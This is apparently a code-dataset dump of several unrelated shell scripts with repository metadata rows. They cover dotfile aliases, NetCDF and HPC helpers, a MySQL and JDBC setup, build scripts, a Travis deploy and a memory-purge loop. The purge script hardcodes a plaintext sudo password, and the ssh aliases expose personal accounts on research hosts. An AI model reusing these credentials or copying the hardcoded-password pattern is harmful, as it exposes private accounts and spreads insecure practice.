$_macos || alias hardware="cat /etc/*-release" # print out Debian, etc. release info
$_macos || alias cores="cat /proc/cpuinfo | awk '/^processor/{print \$3}' | wc -l"
# Directory sizes, normal and detailed, analagous to ls/ll
alias df="df -h" # disk useage
alias du='du -h -d 1' # also a better default du
ds() {
local dir
[ -z $1 ] && dir="." || dir="$1"
find "$dir" -maxdepth 1 -mindepth 1 -type d -print | sed 's|^\./||' | sed 's| |\\ |g' | _columnize
}
dl() {
local cmd dir
[ -z $1 ] && dir="." || dir="$1"
! $_macos && cmd=sort || cmd=gsort
find "$dir" -maxdepth 1 -mindepth 1 -type d -exec du -hs {} \; | sed $'s|\t\./|\t|' | sed 's|^\./||' | $cmd -sh
}
# Grepping and diffing; enable colors
alias grep="grep --exclude-dir=_site --exclude-dir=plugged --exclude-dir=.git --exclude-dir=.svn --color=auto"
alias egrep="egrep --exclude-dir=_site --exclude-dir=plugged --exclude-dir=.git --exclude-dir=.svn --color=auto"
# git-completion
if [ -f ~/dotfiles/.git-completion.bash ]; then
. ~/dotfiles/.git-completion.bash
fi
#-----------------------------------------------------------------------------#
# Aliases/functions for printing out information
#-----------------------------------------------------------------------------#
# The -X show bindings bound to shell commands (i.e. not builtin readline functions, but strings specifying our own)
# The -s show bindings 'bound to macros' (can be combination of key-presses and shell commands)
# NOTE: Example for finding variables:
# for var in $(variables | grep -i netcdf); do echo ${var}: ${!var}; done
# NOTE: See: https://stackoverflow.com/a/949006/4970632
alias aliases="compgen -a"
alias variables="compgen -v"
alias functions="compgen -A function" # show current shell functions
alias builtins="compgen -b" # bash builtins
alias commands="compgen -c"
alias keywords="compgen -k"
alias modules="module avail 2>&1 | cat "
if $_macos; then
alias bindings="bind -Xps | egrep '\\\\C|\\\\e' | grep -v 'do-lowercase-version' | sort" # print keybindings
alias bindings_stty="stty -e" # bindings
else
alias bindings="bind -ps | egrep '\\\\C|\\\\e' | grep -v 'do-lowercase-version' | sort" # print keybindings
alias bindings_stty="stty -a" # bindings
fi
alias inputrc_ops="bind -v" # the 'set' options, and their values
alias inputrc_funcs="bind -l" # the functions, for example 'forward-char'
env() { set; } # just prints all shell variables
#-----------------------------------------------------------------------------#
# Supercomputer tools
#-----------------------------------------------------------------------------#
alias suser="squeue -u $USER"
alias sjobs="squeue -u $USER | tail -1 | tr -s ' ' | cut -s -d' ' -f2 | tr -d '[:alpha:]'"
# Kill PBS processes all at once; useful when debugging stuff, submitting teeny
# jobs. The tail command skips first (n-1) lines.
qkill() {
local proc
for proc in $(qstat | tail -n +3 | cut -d' ' -f1 | cut -d. -f1); do
qdel $proc
echo "Deleted job $proc"
done
}
#-----------------------------------------------------------------------------#
# Dataset utilities
#-----------------------------------------------------------------------------#
# NetCDF tools (should just remember these)
# NCKS behavior very different between versions, so use ncdump instead
# * Note if HDF4 is installed in your anaconda distro, ncdump will point to *that location* before
# the homebrew install location 'brew tap homebrew/science, brew install cdo'
# * This is bad, because the current version can't read netcdf4 files; you really don't need HDF4,
# so just don't install it
# Summaries first
nchelp() {
echo "Available commands:"
echo "ncinfo ncglobal ncvars ncdims
ncin nclist ncvarlist ncdimlist
ncvarinfo ncvardump ncvartable ncvartable2" | column -t
}
ncglobal() { # show just the global attributes
[ $# -ne 1 ] && echo "Usage: ncglobal FILE" && return 1
command ncdump -h "$@" | grep -A100 ^// | less
}
ncinfo() { # only get text between variables: and linebreak before global attributes
# command ncdump -h "$1" | sed '/^$/q' | sed '1,1d;$d' | less # trims first and last lines; do not need these
[ $# -ne 1 ] && echo "Usage: ncinfo FILE" && return 1
! [ -r "$1" ] && { echo "File \"$1\" not found."; return 1; }
command ncdump -h "$1" | sed '1,1d;$d' | less # trims first and last lines; do not need these
}
ncvars() { # the space makes sure it isn't another variable that has trailing-substring
# identical to this variable, -A prints TRAILING lines starting from FIRST match,
# -B means prinx x PRECEDING lines starting from LAST match
[ $# -ne 1 ] && echo "Usage: ncvars FILE" && return 1
! [ -r "$1" ] && echo "Error: File \"$1\" not found." && return 1
command ncdump -h "$1" | grep -A100 "^variables:$" | sed '/^$/q' | \
sed $'s/^\t//g' | grep -v "^$" | grep -v "^variables:$" | less
}
ncdims() {
[ $# -ne 1 ] && echo "Usage: ncdims FILE" && return 1
! [ -r "$1" ] && echo "Error: File \"$1\" not found." && return 1
command ncdump -h "$1" | sed -n '/dimensions:/,$p' | sed '/variables:/q' | sed '1d;$d' \
| tr -d ';' | tr -s ' ' | column -t
}
# Listing stuff
ncin() { # simply test membership; exit code zero means variable exists, exit code 1 means it doesn't
[ $# -ne 2 ] && echo "Usage: ncin VAR FILE" && return 1
! [ -r "$2" ] && echo "Error: File \"$2\" not found." && return 1
command ncdump -h "$2" | sed -n '/dimensions:/,$p' | sed '/variables:/q' \
| cut -d'=' -f1 -s | xargs | tr ' ' '\n' | grep -v '[{}]' | grep "$1" &>/dev/null
}
nclist() { # only get text between variables: and linebreak before global attributes
# note variables don't always have dimensions! (i.e. constants)
# in this case looks like " double var ;" instead of " double var(x,y) ;"
[ $# -ne 1 ] && echo "Usage: nclist FILE" && return 1
! [ -r "$1" ] && echo "Error: File \"$1\" not found." && return 1
command ncdump -h "$1" | sed -n '/variables:/,$p' | sed '/^$/q' | grep -v '[:=]' \
| cut -d';' -f1 | cut -d'(' -f1 | sed 's/ *$//g;s/.* //g' | xargs | tr ' ' '\n' | grep -v '[{}]' | sort
}
ncdimlist() { # get list of dimensions
[ $# -ne 1 ] && echo "Usage: ncdimlist FILE" && return 1
! [ -r "$1" ] && echo "Error: File \"$1\" not found." && return 1
command ncdump -h "$1" | sed -n '/dimensions:/,$p' | sed '/variables:/q' \
| cut -d'=' -f1 -s | xargs | tr ' ' '\n' | grep -v '[{}]' | sort
}
ncvarlist() { # only get text between variables: and linebreak before global attributes
local list dmnlist varlist
[ $# -ne 1 ] && echo "Usage: ncvarlist FILE" && return 1
! [ -r "$1" ] && echo "Error: File \"$1\" not found." && return 1
list=($(nclist "$1"))
dmnlist=($(ncdimlist "$1"))
for item in "${list[@]}"; do
if [[ ! " ${dmnlist[@]} " =~ " $item " ]]; then
varlist+=("$item")
fi
done
echo "${varlist[@]}" | tr -s ' ' '\n' | grep -v '[{}]' | sort # print results
}
# Inquiries about specific variables
ncvarinfo() { # as above but just for one variable
[ $# -ne 2 ] && echo "Usage: ncvarinfo VAR FILE" && return 1
! [ -r "$2" ] && echo "Error: File \"$2\" not found." && return 1
command ncdump -h "$2" | grep -A100 "[[:space:]]$1(" | grep -B100 "[[:space:]]$1:" | sed "s/$1://g" | sed $'s/^\t//g'
# the space makes sure it isn't another variable that has trailing-substring
# identical to this variable; and the $'' is how to insert literal tab
}
ncvardump() { # dump variable contents (first argument) from file (second argument)
[ $# -ne 2 ] && echo "Usage: ncvardump VAR FILE" && return 1
! [ -r "$2" ] && echo "Error: File \"$2\" not found." && return 1
$_macos && _reverse="gtac" || _reverse="tac"
# command ncdump -v "$1" "$2" | grep -A100 "^data:" | tail -n +3 | $_reverse | tail -n +2 | $_reverse
command ncdump -v "$1" "$2" | $_reverse | egrep -m 1 -B100 "[[:space:]]$1[[:space:]]" | sed '1,1d' | $_reverse
# tail -r reverses stuff, then can grep to get the 1st match and use the before flag to print stuff
# before (need extended grep to get the coordinate name), then trim the first line (curly brace) and reverse
}
ncvartable() { # parses the CDO parameter table; ncvarinfo replaces this
# Below procedure is ideal for "sanity checks" of data; just test one
# timestep slice at every level; the tr -s ' ' trims multiple whitespace
# to single and the column command re-aligns columns
[ $# -ne 2 ] && echo "Usage: ncvartable VAR FILE" && return 1
! [ -r "$2" ] && echo "Error: File \"$2\" not found." && return 1
local args=("$@")
local args=(${args[@]:2}) # extra arguments
cdo -s infon ${args[@]} -seltimestep,1 -selname,"$1" "$2" | tr -s ' ' | cut -d ' ' -f 6,8,10-12 | column -t 2>&1 | less
}
ncvartable2() { # as above but show everything
[ $# -ne 2 ] && echo "Usage: ncvartable2 VAR FILE" && return 1
! [ -r "$2" ] && echo "Error: File \"$2\" not found." && return 1
local args=("$@")
local args=(${args[@]:2}) # extra arguments
cdo -s infon ${args[@]} -seltimestep,1 -selname,"$1" "$2" 2>&1 | less
}
#-----------------------------------------------------------------------------#
# Aliases
#-----------------------------------------------------------------------------#
# CU Boulder Web
alias storm='ssh ribr5703@storm.colorado.edu'
# CU Boulder Summmit
alias summit='ssh ribr5703@login.rc.colorado.edu'
# NCAR Cheyenne
alias cheyenne='ssh -X -t rbrady@cheyenne.ucar.edu'
# LANL Institutional Computing
alias lanl='ssh -X -t rileybrady@wtrw.lanl.gov'
alias grizzly='ssh -X -t rileybrady@wtrw.lanl.gov ssh gr-fe'
alias wolf='ssh -X -t rileybrady@wtrw.lanl.gov ssh wf-fe'
alias jupyter-grizzly='ssh -X -t -L 8888:localhost:2452 rileybrady@wtrw.lanl.gov ssh -L 2452:localhost:8888 gr-fe1'
# NERSC/CORI
alias cori='ssh -X -t bradyrx@cori.nersc.gov'
# Cellar
alias cellar='ssh ribr5703@cellar.int.colorado.edu'
# # Software
alias matlab='MATLAB -nodesktop -nosplash'
# # Assorted commands
alias filecount='ls | wc -l'
# PBS Job Scheduler (e.g. Cheyenne)
# interactive job
alias qi='qsub -I -l select=1:ncpus=1 -l walltime=10800 -A P93300670 -q share'
# see your jobs
alias qq='qstat -u ${USER}'
# job history
alias qh='qhist -u ${USER}'
# Slurm Job Scheduler (e.g. LANL IC)
# interactive job
alias sinteractive='salloc --time=04:00:00 --qos=interactive'
# see your jobs
alias sq='squeue -u ${USER}'
# check what jobs are running on system
alias srunning='squeue -l | grep " RUNNING" | more'
# check what jobs are idle on system
alias sidle='squeue -l | grep -v " RUNNING" | more'
# check approximate start time for your jobs
alias sstart='squeue --start -u ${USER}'
# Get full name of jobs that are running
alias sname='sacct --format="JobID,JobName%60"'
# Weather!
alias weather='curl wttr.in'
# Other
alias cl='clear'
| true |
cc3e3d6701a55d1aca0260669466f1e94ef3a784 | Shell | umd-lib/aspace-vagrant | /scripts/database.sh | UTF-8 | 595 | 2.8125 | 3 | [
"Apache-2.0"
] | permissive | #/bin/bash
MYSQL_JDBC_VERSION=5.1.38
# install JDBC driver
cd /apps/aspace/archivesspace
curl -Lso lib/mysql-connector-java-${MYSQL_JDBC_VERSION}.jar \
https://maven.lib.umd.edu/nexus/repository/central/mysql/mysql-connector-java/${MYSQL_JDBC_VERSION}/mysql-connector-java-${MYSQL_JDBC_VERSION}.jar
# set up MySQL database
mysql -u root <<END
CREATE DATABASE archivesspace default character set utf8;
CREATE USER 'as'@'localhost' IDENTIFIED BY 'as';
GRANT ALL PRIVILEGES ON archivesspace.* TO 'as'@'localhost';
END
# create tables
source /apps/aspace/config/env
scripts/setup-database.sh
| true |
56d4379b51dad97f2d977ead5e4c665097f7655c | Shell | gstadhiyal/shell_scripting | /num_patrn1.sh | UTF-8 | 170 | 2.953125 | 3 | [] | no_license | #!/bin/sh
echo -n "How many time your want to print start: "
read b
for ((i=1; i<=$b ;i++))
do
for ((j=1; j<=i; j++ ))
do
echo -n "$j "
done
echo
done
| true |
04b98bbac8cc37b859f0e415fddeb8cb17c83881 | Shell | adamjedrzejewski/ToddLinux | /host/setup/packages/binutils.sh | UTF-8 | 490 | 2.921875 | 3 | [
"MIT"
] | permissive | # See LICENSE for license details.
#!/bin/bash
set -euo pipefail
unpack_src() {
rm -r binutils-2.36.1 2>/dev/null
tar xf binutils-2.36.1.tar.xz && cd binutils-2.36.1 && mkdir build && cd build
return
}
configure() {
../configure --prefix=$LFS/tools \
--with-sysroot=$LFS \
--target=$LFS_TGT \
--disable-nls \
--disable-werror
return
}
make_install() {
make && make -j1 install
return
}
unpack_src && configure && make_install
| true |
461afc3f2ab95b9ba7369c645de988c9bec35184 | Shell | pedroromn/shwork | /and_comparision_string.sh | UTF-8 | 259 | 3.65625 | 4 | [] | no_license | #! /bin/bash
state=${1}
capital=${2}
if [ $state == "CA" -a "$capital" == "sacramento" ]
then
echo "Yes. California capital is sacramento"
fi
if [ $state == "CA" -a "$capital" != "sacramento" ]
then
echo "No. California capital is not $capital"
fi
| true |
5c339b4ed4a14158ac020b57ef1b66f9f4e6e3ee | Shell | tenlastic/open-platform | /scripts/continuous-integration-angular.sh | UTF-8 | 328 | 2.703125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
set -e
TAG=$(git describe --match "angular-v*" --abbrev=0 HEAD)
REVISION=$(git log -1 --format=format:"%H" $TAG)
# Lint, test, and build Angular applications.
lerna run lint --since $REVISION
lerna run build --concurrency 1 --include-dependencies --since $REVISION
lerna run test --concurrency 1 --since $REVISION
| true |
74c7ff6aa05314264f698d2d052c58fc61ff4285 | Shell | DeSerg/dotfiles | /.unset_tmout | UTF-8 | 195 | 3.140625 | 3 | [] | no_license | #!/bin/bash
variable-is-set() {
declare -p "$1" &>/dev/null
}
if variable-is-set TMOUT
then
echo "TMOUT set, unsetting"
gdb -ex 'call unbind_variable("TMOUT")' --pid=$$ --batch
fi
| true |
5ac61700bb82dd0673b606e98f7a99a8b55a1799 | Shell | ngroberio/ocpAdvDepl | /config/bin/podLivenessCheck.sh | UTF-8 | 325 | 3.171875 | 3 | [] | no_license | #!/bin/bash
echo ">> Liveness Check for Pod ${1} from Project ${2}"
sleep $3
while : ; do
echo ">>>>> CHECK IF POD ${1} IS READY..."
oc get pod -n $2 | grep $1 | grep -v build | grep -v deploy |grep "1/1.*Running"
[[ "$?" == "1" ]] || break
echo "NOT YET :( - WAITING FOR MORE ${3} SECONDS TO RETRY."
sleep $3
done
| true |
3c95a90756baec8af9c4a295a47cc3e8f796c693 | Shell | ssabetan/minimega | /misc/vmbetter_configs/protonuke_overlay/init | UTF-8 | 451 | 2.578125 | 3 | [] | no_license | #!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs udev /dev
mkdir /dev/pts
mount -n -t devpts -o gid=5,mode=620 none /dev/pts
udevd --daemon
udevadm trigger
udevadm settle
chmod a+rx /
modprobe loop
ulimit -n 999999
PROTONUKE=`/protoargs`
ifconfig lo up
dhclient -v eth0
mkdir /var/run/sshd
/usr/sbin/sshd
# start protonuke
/protonuke $PROTONUKE > /protonuke.log &
setsid sh -c 'exec sh </dev/tty1 >/dev/tty1 2>&1'
| true |
90cfa6b47280d49cfeb22e2fa9d2c22f54f3d9ff | Shell | fangfeixiang/fang | /inrsync.sh | UTF-8 | 372 | 3.109375 | 3 | [] | no_license | #!/bin/bash
#本脚本是用inotify和rsync配合实现两个文件/文件夹时时同步,可以pgrep -l inotify查看后台进程
#启动脚本时需要给定两具位置变量,分别代表原文件,目标文件
FROM_F=$1
DEST_F=$2
RSYNC_CMD="rsync -az --delete $FROM_F $DEST_F"
while inotifywait -rqq -e modify,delete,create,move,attrib $FROM_F
do
$RSYNC_CMD
done &
| true |
4d441d42273576a70799091da29516519dc9ada1 | Shell | hufflegamer123/GodModeButForLinux | /services.sh | UTF-8 | 2,052 | 3.640625 | 4 | [] | no_license | #!/bin/bash
echo '!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!'
echo ' pay attention!!!'
echo ' Did you come back after'
echo ' editing the badServices file?'
echo ' (y/n)'
echo '!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!'
read -p 'y/n: ' RESP
if [ $RESP == 'y' ]
then
IFS=$'\n' read -d '' -r -a badServices < badServices.txt
for i in ${badServices[@]}
do
systemctl disable ${i}
echo "Disabled ${i}"
echo
done
exit 1
else
echo "Okay"
fi
service --status-all > services.txt
servicesWhitelist=`awk -F] '{print $2}' servicesWhitelist.txt`
services=`awk -F] '{print $2}' services.txt`
echo "${servicesWhitelist//[[:blank:]]/}" > servicesWhitelist.txt
echo "${services//[[:blank:]]/}" > services.txt
sort services.txt > services2.txt
cat services2.txt > services.txt
sort servicesWhitelist.txt > servicesWhitelist2.txt
cat servicesWhitelist2.txt > servicesWhitelist.txt
comm -2 -3 services.txt servicesWhitelist.txt > badServices.txt
echo '!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!'
echo ' pay attention!!!'
cat badServices.txt
echo ' Do you want to delete these services?'
echo ' (y/n)'
echo '!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!'
read -p 'y/n: ' RESP
if [ $RESP == 'y' ]
then
echo
echo "Then let's do this"
echo
else
echo
echo "Then edit the badServices file."
exit 1
fi
echo 'it worked'
IFS=$'\n' read -d '' -r -a badServices < badServices.txt
for i in ${badServices[@]}
do
systemctl disable ${i}
echo "Disabled ${i}"
done
echo '!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!'
echo ' pay attention!!!'
echo ' Do you want to reverse this action?'
echo ' (y/n)'
echo '!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!'
read -p 'y/n: ' RESP
if [ $RESP == 'y' ]
then
for i in ${badServices[@]}
do
systemctl enable ${i}
echo "Reenabled ${i}"
echo
done
else
echo "I'm glad to see at least someone is responsible..."
echo
fi
| true |
c30ddecff57a093ae76eae0f76d3098e9cf49e21 | Shell | retronym/libscala | /bin/filter-git-repositories | UTF-8 | 327 | 3.9375 | 4 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | #!/bin/sh
#
[[ $# -gt 0 ]] || {
echo "Usage: $(basename $0) <command> [repo repo....]"
echo " Runs command with cwd of each repo, echoing the name of the repo if it returns true."
exit 0
}
command="$1"
shift
for repo in "$@"; do
( cd "$repo" 2>/dev/null && [[ -d .git ]] && eval "$command" >/dev/null && pwd )
done
| true |
e55b10304947bb01f674013a446853e0fa98c036 | Shell | Naincy224/naincyassignment | /practice problem day6/Day06Prob01/Day06Prob2.sh | UTF-8 | 174 | 2.859375 | 3 | [] | no_license | #!/bin/bash -x
read num;
har_num=0;
for ((i=1; i<=$num; i++))
do
cond=$(echo "scale=3;1/$i" |bc)
har_num=$(echo "scale=3;$har_num+$cond" |bc);
done
echo "$har_num";
| true |
48dd960a02c374359b885e41e9bcc863a4a40f36 | Shell | 5l1v3r1/Write-Ups-1 | /CTF/DownUnderCTF_2021/Misc/Rabbit/script.sh | UTF-8 | 696 | 3.375 | 3 | [] | no_license | #!/usr/bin/env bash
FLAG=$(file flag.txt)
XZ='XZ'
EMPTY='empty'
BZIP2='bzip2'
GZIP='gzip'
ZIP='Zip'
TEXT='text'
while [[ $FLAG != "flag.txt: ASCII text" ]]; do
FLAG=$(file flag.txt)
if grep -q "$XZ" <<< "$FLAG";then
mv flag.txt flag.txt.xz; xz -d flag.txt.xz;
elif grep -q "$EMPTY" <<< "$FLAG";then
unzip -o flag.txt
elif grep -q "$BZIP2" <<< "$FLAG";then
mv flag.txt flag.txt.bz2; bzip2 -d flag.txt.bz2
elif grep -q "$GZIP" <<< "$FLAG";then
mv flag.txt flag.txt.gz; gzip -d flag.txt.gz
elif grep -q "$ZIP" <<< "$FLAG";then
unzip -o flag.txt
else grep -q "$TEXT" <<< "$FLAG";
cat flag.txt | base64 -d
fi
done
| true |
005aa9ef7963958175ed2c046836661a560de52c | Shell | sergi/dotfiles | /shell/bash_exports | UTF-8 | 1,864 | 2.78125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# bash_config
# Make vim the default editor
export EDITOR="vim"
# Ignore duplicate commands in the history
export HISTCONTROL=ignoredups
# Increase the maximum number of lines contained in the history file
# (default is 500)
export HISTFILESIZE=10000
# Increase the maximum number of commands to remember
# (default is 500)
export HISTSIZE=10000
# Make some commands not show up in history
# export HISTIGNORE="ls:ls *:cd:cd -:pwd;exit:date:* --help"
# Don't clear the screen after quitting a manual page
export MANPAGER="less -X"
# Export PhantomJS bin location (be explicit in case Homebrew is not installed
# in the default location)
export PHANTOMJS_BIN="$(brew --prefix)/bin/phantomjs"
# Make new shells get the history lines from all previous
# shells instead of the default "last window closed" history
export PROMPT_COMMAND="history -a; $PROMPT_COMMAND"
# This is necessary because Ruby is stupid
export LC_ALL=en_US.UTF-8
export LANG=en_US.UTF-8
export CLOJURESCRIPT_HOME=~/programming/clojurescript
export GOPATH=$HOME/go
export GECKO_PATH=~/programming/mozilla-central
export JAVA_HOME=$(/usr/libexec/java_home)
export PKG_CONFIG_PATH=/usr/local/lib/pkgconfig
export CHICKEN_BUILD=~/programming/chicken-4.9.0.1
export NVM_DIR=~/.nvm
export GAIADIR="~/programming/gaia"
export NIGHTLY="/Applications/FirefoxNightly.app/Contents/MacOS"
# Always enable colored `grep` output
export GREP_OPTIONS="--color=auto";
# Link Homebrew casks in `/Applications` rather than `~/Applications`
export HOMEBREW_CASK_OPTS="--appdir=/Applications";
export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/share/npm/bin:~/.cabal/bin:~/programming/android-sdk/platform-tools:~/programming/KindleGen_Mac_i386_v2_8:$CLOJURESCRIPT_HOME/bin:/Applications/Racket\ v6.1.1/bin:/usr/local/opt/go/libexec/bin:/usr/local/go/bin
| true |
fd79fa332df88aac88a68eb9e9452ca5a799eed0 | Shell | soccertack/kvmperf | /tests/common.sh | UTF-8 | 640 | 3.078125 | 3 | [] | no_license | #!/bin/bash
if [[ -f .localconf ]]; then
source .localconf
fi
DO_POWER=0
POWER_PID=0
if [[ -f powerconf ]]; then
source powerconf
fi
COLDLOG=cold.txt
TIMELOG=time.txt
TIME="/usr/bin/time --format=%e -o $TIMELOG --append"
COLDTIME="/usr/bin/time --format=%e -o $COLDLOG --append"
KERNEL="linux-3.6"
KERNEL_TAR="$KERNEL.tar.bz2"
if [[ -n "$REPTS_LIM" && $REPTS_LIM -lt $REPTS ]]; then
REPTS="$REPTS_LIM"
fi
# Host Type Specific Defines
if [[ "$TESTARCH" == "x86" ]]; then
export ARCH=arm
export CROSS_COMPILE=arm-linux-gnueabi-
else # ARM
export ARCH=arm
export CROSS_COMPILE=""
fi
if [[ -f power.sh ]]; then
source power.sh
fi
| true |
e1f6f6d0a14789c37e13120d3897eb013b708460 | Shell | punalpatel/runtime-ci | /scripts/ci/deprovision-bosh-lite/task | UTF-8 | 489 | 3.328125 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
set -exu
aws ec2 describe-instances --filters "Name=tag:Name,Values=${BOSH_LITE_NAME}" \
--output text --query 'Reservations[*].Instances[*].InstanceId' | \
tr '\n' ' ' > instances-to-delete
if [ -s instances-to-delete ]
then
echo "Deleting instances:"
cat instances-to-delete
aws ec2 terminate-instances --instance-ids $(cat instances-to-delete)
aws ec2 wait instance-terminated --instance-ids $(cat instances-to-delete)
else
echo "No instances to delete"
fi
| true |
822ac7265cf1e836dc6351d5267f7080eefa8419 | Shell | rgve/LiveRNome | /171030_StringTie_Assemble_all4mergedBAM_JNS.sh | UTF-8 | 1,116 | 3.34375 | 3 | [] | no_license | #!/bin/bash
#script for assembling novel GTF files from BAM files
#Made by Jonas N. Søndergaard
#Made on 171030
#UPPMAX commands (Uppsala Multidisciplinary Center for Advanced Computational Science)
#SBATCH -A uppmax_proj_number
#SBATCH -p core
#SBATCH -n 8
#SBATCH -t 4:00:00
#SBATCH -J 171030_StringTie_Assemble
#SBATCH --output=171030_StringTie_Assemble.out
#SBATCH --error=171030_StringTie_Assemble.err
#load packages. bioinfo-tools is loaded on uppmax in order to load all other packages used.
module load bioinfo-tools
module load StringTie/1.3.3
#file paths
BAM_PATH=/proj/BAMfiles_sorted
OUTPUT_PATH=/proj/StringTie/
REF_PATH=/proj/ref_genomes
#loop to assemble novel GTFs for 11 files
for i in {1..11}; do \
FILE_NAME=`sed "${i}q;d" siRNA.list`
stringtie \
-p 8 \
--rf \
-G ${REF_PATH}/gencode.v27.annotation.gtf \
-o ${OUTPUT_PATH}/${FILE_NAME}.gtf \
${BAM_PATH}/${FILE_NAME}*.bam
done
#Readme:
#-p: number of computational cores used to run the script
#--rf: Assumes a stranded library fr-firststrand as found with Illumina Truseq library prep protocol.
#-G: known annotations
#-o: output file name
| true |
b6f778fc5773135315b9424281d7289889d42f0d | Shell | rixycf/concourse-weblog-test | /scripts/hugo_generate.sh | UTF-8 | 510 | 2.640625 | 3 | [] | no_license | #!/bin/sh
# generate files
set -e
set -x
hugo -s resource-hugo
cd resource-hugo
pwd
cd public
# git pull
echo "test" >> test.txt
git config --global user.email "kasnake1013@gmail.com"
git config --global user.name "rixycf"
git status
git add .
git commit -m "concourse test"
cd ..
git clone public ../public_modified
# cd ../public_modified
#
# echo "test" >> test.txt
# pwd
#
# git config --global user.email "kasnake1013@gmail.com"
# git config --global user.name "rixycf"
# git status
# git add .
# git commit -m "concourse test"
| true |
0b6c6f7fca9fab01e0ed46fb1b88ad957f2dc9fd | Shell | Akilestar/Andon-Automated-RDP | /RDP/06062017/changeHostnameFILES.bsh | UTF-8 | 2,465 | 3.953125 | 4 | [] | no_license | #!/bin/bash
##Change Hostname Script
##Created by Nathan Knight
##Last Updated June 6th 2017
export lineSelect='1'
export lineName='No Line Selected'
export namePrefix='Andon'
export dept="No Department Selected"
export lineTextList="~/scripts/RDP/text\ files/AssemblyUsernames.text"
export rowNum='1'
printf '%s\n' "Department List"
printf '%s\n' "[1] Assembly"
printf '%s\n' "[2] Sensor"
printf '%s\n' "[3] Mounting"
printf '%s\n' "[4] Inspection"
printf '%s\n' "[5] Terminal Insertion \ Depanelizers"
printf '%s\n' "[6] EWP"
printf '%s\n' "[7] Other"
while [ "$dept" == "No Department Selected" ]; do
printf "%s\n" "Select Department"
read -p "" deptSelect
case $deptSelect in
[1]* ) dept='Assembly';;
[2]* ) dept='Sensor';;
[3]* ) dept='Mounting';;
[4]* ) dept='Inspection';;
[5]* ) dept='Terminal Insertion \- Depanelizers';;
[6]* ) dept='EWP';;
[7]* ) dept='Other';;
esac
done
printf "%s\n" "$dept"
#Department Line Lists
##Assembly
if [ "$dept" == 'Assembly' ]; then
#set text list to correct file
lineTextList="/home/pi/scripts/RDP/text files/AssemblyUsernames.text"
#map text file lines to array
mapfile -t lineList < "$lineTextList"
#print line selection list
printf "%s\n" "Line List"
while IFS= read -r line; do
printf "[%s]\t%s\n" "$rowNum" "$line"
rowNum=$(($rowNum+1))
done < "$lineTextList"
#get user input
while [ "$lineName" == "No Line Selected" ]; do
printf "%s\n" "Select Line"
#set line based on user input
read -p "" lineSelect
lineSelect=$(($lineSelect-1))
lineName=${lineList[$lineSelect]}
done
fi
##Sensor
if [ "$dept" == 'Sensor' ]; then
#set text list to correct file
lineTextList="/home/pi/scripts/RDP/text files/SensorUsernames.text"
#map text file lines to array
mapfile -t lineList < "$lineTextList"
#print line selection list
printf "%s\n" "Line List"
while IFS= read -r line; do
printf "[%s]\t%s\n" "$rowNum" "$line"
rowNum=$(($rowNum+1))
done < "$lineTextList"
#get user input
while [ "$lineName" == "No Line Selected" ]; do
printf "%s\n" "Select Line"
#set line based on user input
read -p "" lineSelect
lineSelect=$(($lineSelect-1))
lineName=${lineList[$lineSelect]}
done
fi
#Change Hostname
HOSTNAME="$namePrefix$lineName"
echo $HOSTNAME
#sudo hostname $HOSTNAME
| true |
0470bd7014d44b8fbcae96c33ddfc416de5fbaef | Shell | iiscsanjay/system_files | /Mac/FreeMacMemory.sh | UTF-8 | 431 | 2.84375 | 3 | [] | no_license | #!/bin/bash
running=1
PASS="dasSumitaba"
trap '{echo "sigint"; running=0; }' SIGINT
while ((running)); do
Report=`/usr/bin/python3 /Users/sanjayk/Dropbox/git/Mac/memReport3.py | awk '/Inactive Memory:/ {print $3}'`
if [ $Report -ge 300 ] ; then
echo $PASS | sudo -S purge
Report=`/usr/bin/python3 /Users/sanjayk/Dropbox/git/Mac/memReport3.py | awk '/Inactive Memory:/ {print $3}'`
fi
sleep 120
done
| true |
1e8915b7daa1ab3a745f58b3db8bf144c4338ca3 | Shell | KevinsBobo/KevinsBobo.github.io | /_travis.sh | UTF-8 | 1,620 | 3.640625 | 4 | [
"CC0-1.0"
] | permissive | #!/bin/bash
#定义时间
time=`date +%Y-%m-%d\ %H:%M:%S`
#执行成功
function success(){
echo "success"
}
#执行失败
function failure(){
echo "failure"
}
#默认执行
function default(){
cd ./_site
cat <<EOF >> README.md
| 部署状态 | 集成结果 | 参考值 |
| -------- | -------------------------------------- | ----------------------------------- |
| 完成时间 | $time | yyyy-mm-dd hh:mm:ss |
| 部署环境 | $TRAVIS_OS_NAME + $TRAVIS_NODE_VERSION | window \| linux + stable |
| 部署类型 | $TRAVIS_EVENT_TYPE | push \| pull_request \| api \| cron |
| 启用Sudo | $TRAVIS_SUDO | false \| true |
| 仓库地址 | $TRAVIS_REPO_SLUG | owner_name/repo_name |
| 提交分支 | $TRAVIS_COMMIT | hash 16位 |
| 提交信息 | $TRAVIS_COMMIT_MESSAGE |
| Job ID | $TRAVIS_JOB_ID |
| Job NUM | $TRAVIS_JOB_NUMBER |
EOF
git init
git add --all .
git commit -m "Update Blog By TravisCI With Build $TRAVIS_BUILD_NUMBER"
# Github Pages
# git push --force --quiet "https://${REPO_TOKEN}@${GH_REF}" master:master
# Coding Pages
git push --force --quiet "https://${CODING_USER_NAME}:${CODE_TOKEN}@${CODING_REF}" master:master
}
case $1 in
"success")
success
;;
"failure")
failure
;;
*)
default
esac | true |
f9c82687df164bfa7b680b07e3450cf2cf08cd12 | Shell | jknightlab/ATACseq_pipeline | /Core_manuscript/compareParams/run_Fseq-parallel.sh | UTF-8 | 3,289 | 4.125 | 4 | [] | no_license | #/bin/bash
#$ -N fseq
#$ -P jknight.prjc -q short.qc
#$ -o stdout_Fseq -e sterr_Fseq.log -j y
#$ -cwd -V
### Run F-seq on a BED File With User-Specified Parameters
## JHendry, 2016/12/01
## Idea here is to take directory containing .bed file and generate
## an .npf file representing peak calls from F-seq algorithm
